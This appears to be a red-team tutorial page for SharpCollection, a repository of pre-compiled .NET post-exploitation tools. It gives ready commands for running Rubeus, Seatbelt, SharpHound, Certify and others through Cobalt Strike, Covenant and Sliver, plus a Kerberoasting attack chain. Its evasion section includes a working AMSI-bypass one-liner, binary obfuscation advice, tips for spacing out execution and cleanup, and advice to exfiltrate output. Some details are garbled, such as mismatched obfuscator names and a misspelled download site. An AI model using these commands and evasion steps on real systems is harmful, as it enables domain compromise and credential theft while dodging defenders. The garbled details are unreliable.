SharpCollection
SharpCollection is a curated repository of pre-compiled .NET offensive security tools maintained by Flangvik, providing ready-to-use binaries for post-exploitation and red team operations. Rather than compiling tools on target systems, operators can download pre-built versions that are consistent, tested, and optimized for various .NET Framework versions.
Overview
SharpCollection consolidates tools from GhostPack (by harmj0y and team) and community-developed .NET red team utilities into a single repository with nightly builds. The pre-compiled approach offers significant advantages:
- Speed: No compilation time on target systems
- Consistency: Verified working versions across different environments
- Flexibility: Multiple .NET Framework versions available (4.0, 4.5, 4.7)
- Accessibility: Pre-compiled binaries reduce dependencies and complexity
The repository is hosted on GitHub and includes tools for Kerberos exploitation, Active Directory enumeration, privilege escalation, browser credential extraction, and more.
Download and Setup
Clone the SharpCollection repository to your attack machine:
git clone https://github.com/Flangvik/SharpCollection.git
cd SharpCollection
ls -laThe repository structure is organized by .NET Framework version:
SharpCollection/
├── NetFramework_4.0_Any/
├── NetFramework_4.5_Any/
├── NetFramework_4.7_Any/
└── README.mdEach directory contains pre-compiled binaries for different target .NET versions. Explore available tools:
ls -lh NetFramework_4.7_Any/Included Tools Reference
| Tool | Category | Purpose |
|---|---|---|
| Rubeus | Kerberos | Kerberos ticket manipulation, ASREPRoasting, Kerberoasting, ticket renewal |
| Seatbelt | Enumeration | Local enumeration (OS, patches, antivirus, processes, network, services) |
| SharpUp | Privilege Escalation | Windows privilege escalation vector enumeration |
| Certify | Active Directory CS | Active Directory Certificate Services enumeration and exploitation |
| SharpHound | Reconnaissance | BloodHound data collector for Active Directory visualization |
| SharpDPAPI | Data Protection | DPAPI credential dumping and decryption |
| SharpChrome | Credential Extraction | Extract credentials and cookies from Chrome, Edge, Brave |
| SharpView | Active Directory | PowerView-like AD enumeration and recon |
| SharpRDP | Remote Access | RDP session enumeration and reconnaissance |
| SharpWMI | WMI Queries | WMI-based system enumeration and lateral movement |
| SharpGPOAbuse | GPO Abuse | Group Policy manipulation for privilege escalation |
| StandIn | AD Manipulation | Direct LDAP-based Active Directory modifications |
| SharpLAPS | LAPS | LAPS password extraction and enumeration |
| Snaffler | File Enumeration | High-speed file share scanning and classification |
| ADCSPwn | AD CS Exploitation | Automated Active Directory Certificate Services abuse |
| KrbRelay | Kerberos Relay | Kerberos relay attacks for lateral movement |
| SharpSCCM | SCCM Exploitation | SCCM environment enumeration and abuse |
| Whisker | Shadow Credentials | Create Shadow Credentials for AD accounts |
Basic Usage with C2 Frameworks
Cobalt Strike
Execute pre-compiled tools via Cobalt Strike’s execute-assembly:
execute-assembly C:\path\to\Seatbelt.exe -group=system
execute-assembly C:\path\to\Rubeus.exe kerberoast /outfile=roasts.txt
execute-assembly C:\path\to\SharpHound.exe -c All
execute-assembly C:\path\to\Certify.exe find /vulnerableUpload tools to target:
cd NetFramework_4.5_Any
upload Seatbelt.exe
upload Rubeus.exe
upload SharpUp.exeCovenant
Execute via Covenant’s assembly execution:
Assembly /path/to/Seatbelt.exe -group=user
Assembly /path/to/Rubeus.exe tgtdelegSliver
Use Sliver’s execute command:
execute C:\Tools\Seatbelt.exe -group=services
execute C:\Tools\SharpUp.exe audit.NET Framework Version Selection
Choose the correct binary for your target’s .NET Framework version:
| Version | Path | Compatibility | Notes |
|---|---|---|---|
| 4.0 | NetFramework_4.0_Any/ | Widest | Older Windows (Server 2008 R2, Windows 7) |
| 4.5 | NetFramework_4.5_Any/ | Most Common | Windows 8+, Server 2012+ |
| 4.7 | NetFramework_4.7_Any/ | Modern | Windows 10, Server 2016+ |
Determine target .NET version via PowerShell:
# Check installed .NET Framework versions
reg query 'HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP' /s
# Or use this command:
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' |
Select-Object PSChildName, VersionsUsing dotnet binary:
dotnet --versionWhen in doubt, use NetFramework_4.5_Any as it covers most modern Windows systems.
OPSEC Considerations
Hash-Based Detection
Known SharpCollection binaries are detected by EDR and antivirus solutions. Always assume hashes are catalogued:
- Never use pre-compiled binaries without modification
- Modify source and recompile for your environment
- Use binary obfuscation techniques
Obfuscation Methods
Obfuscate binaries with ConfuserEx:
# Install ConfuserEx (on Windows with .NET)
# Download from: confusex.codeplex.com or use alternatives
# Using InvisibilityCloak (command-line option):
InvisibilityCloak.exe -i Seatbelt.exe -o Seatbelt_obf.exeOr use Semantic Insignificance Framework:
SemanticInformationFramework.exe input.exe output.exeAMSI Evasion
Pre-compiled tools may trigger AMSI. Bypass techniques:
# Disable AMSI in-memory (if unpatched):
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').
GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Then execute:
.\Seatbelt.exe -group=userAlternatively, host binaries over HTTP or load via living-off-the-land techniques.
Building from Source
If pre-compiled binaries are blocked, build from source:
- Clone GhostPack repositories:
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus- Build with Visual Studio:
Open the .sln file in Visual Studio and build the solution, or use:
# Or use dotnet CLI:
dotnet build -c Release- Output binary location:
Rubeus/bin/Release/Rubeus.exeCompiling on target systems is slower but may evade binary scanning.
Useful Tool Combinations
Kerberos Attack Chain
# 1. Find roastable users
Rubeus.exe kerberoast /format:hashcat
# 2. Extract TGT for delegation
Rubeus.exe tgtdeleg
# 3. Use ticket for lateral movement
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /ticket:[base64]Post-Exploitation Enumeration
# 1. General system info
Seatbelt.exe -group=system
# 2. Find privilege escalation paths
SharpUp.exe audit
# 3. Check for LAPS passwords
SharpLAPS.exe
# 4. Enumerate AD Certificate Services
Certify.exe find /vulnerableBloodHound Data Collection
SharpHound.exe -c All
SharpHound.exe -c All --ldapusername domain.com\user --ldappassword password
SharpHound.exe -c All --zipfilename output.zipTroubleshooting
Binary Won’t Execute
Issue: Access is denied or binary fails to run
Solutions:
- Verify correct .NET Framework version for target
- Check file permissions
- Bypass execution policy:
powershell -ExecutionPolicy Bypass -File script.ps1 - Execute via
rundll32or other LOLBins if direct execution blocked
Tool-Specific Errors
Seatbelt fails on enumeration:
# Run with specific group only
Seatbelt.exe -group=systemRubeus requires administrative context:
# Certain Rubeus commands require admin
# Check execution context first
whoami /groupsSharpHound connection issues:
# Specify LDAP server explicitly
SharpHound.exe -d domain.com -s dc1.domain.com -c AllBest Practices
- Version Control: Track which binary version you’re using and document results
- Selective Execution: Run only tools needed for your operation (reduces detection surface)
- Output Handling: Redirect output to files and exfiltrate safely
- Timing: Space out tool execution to avoid behavioral detection
- Cleanup: Remove tools from target after use
- Source Builds: For critical operations, build tools from source to avoid known-hash detection
- Testing: Test obfuscated/modified binaries in lab before operational use
- Logging: Monitor target Windows Event Logs for tool execution indicators
Related Tools and Alternatives
Source Repositories
- GhostPack: harmj0y’s original tool suite (Rubeus, Seatbelt, SharpUp)
- BloodHound-CE: Community Edition for AD visualization
- PowerView/PowerUp: PowerShell versions of enumeration and exploitation tools
Language Alternatives
- Beacon Object Files (BOF): Faster execution in memory via Cobalt Strike
- Nim/C2: Rewrite tools in Nim for .NET avoidance
- Go Binaries: Cross-platform alternatives (winrm-go, ldap-go)
Detection Evasion
- ConfuserEx: Obfuscate .NET binaries
- InvisibilityCloak: String encryption and code obfuscation
- NetLoader: Load assemblies directly into memory
References
- SharpCollection GitHub: Maintained nightly builds
- GhostPack Suite: Original security research and tools
- Active Directory exploitation techniques
- .NET Framework documentation for version compatibility